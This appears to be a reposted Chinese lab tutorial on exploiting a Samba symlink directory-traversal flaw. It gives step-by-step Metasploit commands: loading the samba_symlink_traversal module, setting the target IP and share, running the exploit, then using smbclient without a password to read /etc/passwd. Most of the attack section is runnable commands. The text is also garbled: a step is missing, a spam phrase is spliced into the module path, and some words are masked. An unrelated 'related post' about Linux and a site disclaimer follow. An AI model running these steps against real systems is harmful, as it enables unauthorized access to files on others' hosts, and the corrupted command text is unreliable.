Metasploit溢出samba提权漏洞


Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。
1.3在终端中输入命令“msfconsole”,启动MSF终端。1.4在终端中输入命令“search samba”,搜索samba的相关工具和***载荷。1.5在终端中输入命令“use a免费云主机域名uxiliary/admin/smb/samba_symlink_traversal”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6在终端中输入命令“info”,查看需要设置的相关项,“yes”表示必须填写的参数。
1.7在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。1.8在终端中输入“set SMBSHARE tmp”, 设置SAM可写文件。1.9在终端中输入“exploit”, 开始***。1.10新打开一个终端,输入“smbclient //192.168.1.3/tmp”,直接回车,不用输入密码。
1.11在终端中输入“cd rootfs”, 进入rootfs目录,在终端下输入命令“ls”,列出目录。
1.12在终端中输入“more /etc/passwd”, 查看目标主机系统中的密码。

相关推荐: linux是内核吗

今天小编给大家分享一下linux是内核吗的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。 linux是内核,不是完整的操作系统。linux只是实现…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 01/27 21:37
下一篇 01/27 21:37